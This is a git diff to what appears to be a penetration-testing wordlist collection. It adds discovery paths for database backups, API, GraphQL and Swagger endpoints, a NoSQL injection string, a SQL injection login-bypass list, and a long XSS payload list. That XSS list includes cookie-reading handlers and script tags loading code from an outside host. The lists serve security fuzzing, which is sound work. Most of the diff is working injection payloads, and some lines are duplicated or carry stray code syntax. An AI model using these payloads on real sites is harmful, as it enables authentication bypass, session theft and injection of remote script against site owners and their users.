diff --git a/Discovery/Web-Content/Common-DB-Backups.txt b/Discovery/Web-Content/Common-DB-Backups.txt index c6a096be..244a5ddd 100644 --- a/Discovery/Web-Content/Common-DB-Backups.txt +++ b/Discovery/Web-Content/Common-DB-Backups.txt @@ -323,3 +323,14 @@ /web.sql.gz /dbadmin.rar /site.sql.tar +/accounts.sql +/back.sql +/backups.sql +/clients.sql +/customers.sql +/data.sql +/database.sql +/database.sqlite +/setup.sql +/sqldump.sql +/localhost.sql diff --git a/Discovery/Web-Content/api/common_paths.txt b/Discovery/Web-Content/api/common_paths.txt index e7e91f5f..245c9394 100644 --- a/Discovery/Web-Content/api/common_paths.txt +++ b/Discovery/Web-Content/api/common_paths.txt @@ -31,5 +31,13 @@ /api/v1/history/history /api/v1/monitoring/accounts /api/v1/monitoring/address-check +/api/v1/swagger.json +/api/v2/accounts +/api/v2/users +/api/v2/spans +/api/v2/jobs +/api/v2/tickets +/api/v2/swagger.json +/api/v4/projects /swagger/ /api-docs/v1/openapi.json diff --git a/Discovery/Web-Content/graphql.txt b/Discovery/Web-Content/graphql.txt index 0afa0ffa..7c7f47f6 100644 --- a/Discovery/Web-Content/graphql.txt +++ b/Discovery/Web-Content/graphql.txt @@ -1,12 +1,90 @@ -graphql -graphql.php -graphql/console -graphql/schema.json -graphql/schema.yaml -graphql/schema.xml +altair +explorer graphiql +graphiql.css +graphiql/finland +graphiql.js graphiql.min.css graphiql.min.js -graphiql.css -graphiql.js +graphiql.php +graphql +graphql/console +graphql-explorer +graphql.php +graphql/schema.json +graphql/schema.xml +graphql/schema.yaml +playground subscriptions +v1/altair +v1/explorer +v1/graphiql +v1/graphiql.css +v1/graphiql/finland +v1/graphiql.js +v1/graphiql.min.css +v1/graphiql.min.js +v1/graphiql.php +v1/graphql +v1/graphql/console +v1/graphql-explorer +v1/graphql.php +v1/graphql/schema.json +v1/graphql/schema.xml +v1/graphql/schema.yaml +v1/playground +v1/subscriptions +v2/altair +v2/explorer +v2/graphiql +v2/graphiql.css +v2/graphiql/finland +v2/graphiql.js +v2/graphiql.min.css +v2/graphiql.min.js +v2/graphiql.php +v2/graphql +v2/graphql/console +v2/graphql-explorer +v2/graphql.php +v2/graphql/schema.json +v2/graphql/schema.xml +v2/graphql/schema.yaml +v2/playground +v2/subscriptions +v3/altair +v3/explorer +v3/graphiql +v3/graphiql.css +v3/graphiql/finland +v3/graphiql.js +v3/graphiql.min.css +v3/graphiql.min.js +v3/graphiql.php +v3/graphql +v3/graphql/console +v3/graphql-explorer +v3/graphql.php +v3/graphql/schema.json +v3/graphql/schema.xml +v3/graphql/schema.yaml +v3/playground +v3/subscriptions +v3/altair +v3/explorer +v3/graphiql +v3/graphiql.css +v3/graphiql/finland +v3/graphiql.js +v3/graphiql.min.css +v3/graphiql.min.js +v3/graphiql.php +v3/graphql +v3/graphql/console +v3/graphql-explorer +v3/graphql.php +v3/graphql/schema.json +v3/graphql/schema.xml +v3/graphql/schema.yaml +v3/playground +v3/subscriptions diff --git a/Discovery/Web-Content/raft-large-directories.txt b/Discovery/Web-Content/raft-large-directories.txt index 5a45bc72..b7f00c21 100644 --- a/Discovery/Web-Content/raft-large-directories.txt +++ b/Discovery/Web-Content/raft-large-directories.txt @@ -7235,6 +7235,14 @@ your 98 emailpopup family-notices +order-pay +order-received +add-payment-method +delete-payment-method +set-default-payment-method +edit-account +edit-address +customer-logout fuseaction katsushikaku sumidaku diff --git a/Discovery/Web-Content/swagger.txt b/Discovery/Web-Content/swagger.txt index 2fa5729a..2f92ab04 100644 --- a/Discovery/Web-Content/swagger.txt +++ b/Discovery/Web-Content/swagger.txt @@ -4,6 +4,7 @@ /swagger-resources /swagger/static/index.html /swagger-ui/swagger.json +/swagger/ui/index /apidocs/swagger.json /api-docs/swagger.json /swagger-ui @@ -11,39 +12,39 @@ /apidocs /swagger /v1/swagger.json -api/apidocs -api/v1/apidocs -api/v2/apidocs -api/api-docs -api/v1/api-docs -api/v2/api-docs -swagger -swagger/ -swagger.json -swagger-ui -swagger-ui.html -swagger-ui.json -swagger.yml -api/swagger -api/swagger/ -api/swagger.json -api/swagger-ui -api/swagger-ui.html -api/swagger-ui.json -api/v1/swagger -api/v1/swagger/ -api/v1/swagger.json -api/v1/swagger-ui -api/v1/swagger-ui.html -api/v1/swagger-ui.json -api/v2/swagger -api/v2/swagger/ -api/v2/swagger.json -api/v2/swagger-ui -api/v2/swagger-ui.html -api/v2/swagger-ui.json -graphql -api -api/v1/ -api/v2 -api/v3 +/api/apidocs +/api/v1/apidocs +/api/v2/apidocs +/api/api-docs +/api/v1/api-docs +/api/v2/api-docs +/swagger +/swagger/ +/swagger.json +/swagger-ui +/swagger-ui.html +/swagger-ui.json +/swagger.yml +/api/swagger +/api/swagger/ +/api/swagger.json +/api/swagger-ui +/api/swagger-ui.html +/api/swagger-ui.json +/api/v1/swagger +/api/v1/swagger/ +/api/v1/swagger.json +/api/v1/swagger-ui +/api/v1/swagger-ui.html +/api/v1/swagger-ui.json +/api/v2/swagger +/api/v2/swagger/ +/api/v2/swagger.json +/api/v2/swagger-ui +/api/v2/swagger-ui.html +/api/v2/swagger-ui.json +/graphql +/api +/api/v1/ +/api/v2 +/api/v3 \ No newline at end of file diff --git a/Fuzzing/Databases/NoSQL.txt b/Fuzzing/Databases/NoSQL.txt index 83ce0d92..ec1d57c7 100644 --- a/Fuzzing/Databases/NoSQL.txt +++ b/Fuzzing/Databases/NoSQL.txt @@ -9,6 +9,7 @@ $where: '1 == 1' db.injection.insert({success:1}); db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 || 1==1 +' || 'a'=='a ' && this.password.match(/.*/)//+%00 ' && this.passwordzz.match(/.*/)//+%00 '%20%26%26%20this.password.match(/.*/)//+%00 diff --git a/Fuzzing/SQLi/quick-SQLi.txt b/Fuzzing/SQLi/quick-SQLi.txt new file mode 100644 index 00000000..7f30bbf1 --- /dev/null +++ b/Fuzzing/SQLi/quick-SQLi.txt @@ -0,0 +1,77 @@ +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 diff --git a/Fuzzing/XSS/XSS-OFJAAAH.txt b/Fuzzing/XSS/XSS-OFJAAAH.txt new file mode 100644 index 00000000..f0f50668 --- /dev/null +++ b/Fuzzing/XSS/XSS-OFJAAAH.txt @@ -0,0 +1,2977 @@ +: \');confirm(1);// +prompt(1) + + + + + + + + + + + +javascript:/*--> + +

+ CLICK + +
< + + + + +"> +"> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +\x3Cscript>javascript:alert(1) +'"`> + + +--> --> +--> +--> +--> +`"'>

+test +test +test +test +test +test +test +test +test +test +test +test +test +test + + +
+ + + + + +">

123

" + +
DEF +"'`>ABC
DEF + + + +'`"><\x3Cscript>javascript:alert(1) +'`"><\x00script>javascript:alert(1) +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> + + + + +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> + + + + +alert(1)0 +
+ + + + +"> +"> +"> +"> + +<% foo> +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +XXX + + + +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo ;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img src=x:x onerror =javascript:alert(1)>"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +<object onerror=javascript:javascript:alert(1)> +<embed type="image" src=%(scriptlet)s></embed> +<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> +<IMG SRC=&{javascript:alert(1);};> +<a href="javAascript:javascript:alert(1)">test1</a> +<a href="javaascript:javascript:alert(1)">test1</a> +<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> +<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>"> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- +></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<a onmouseover="alert(document.cookie)">xxs link</a> +<a onmouseover=alert(document.cookie)>xxs link</a> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC="  javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// + + + + + +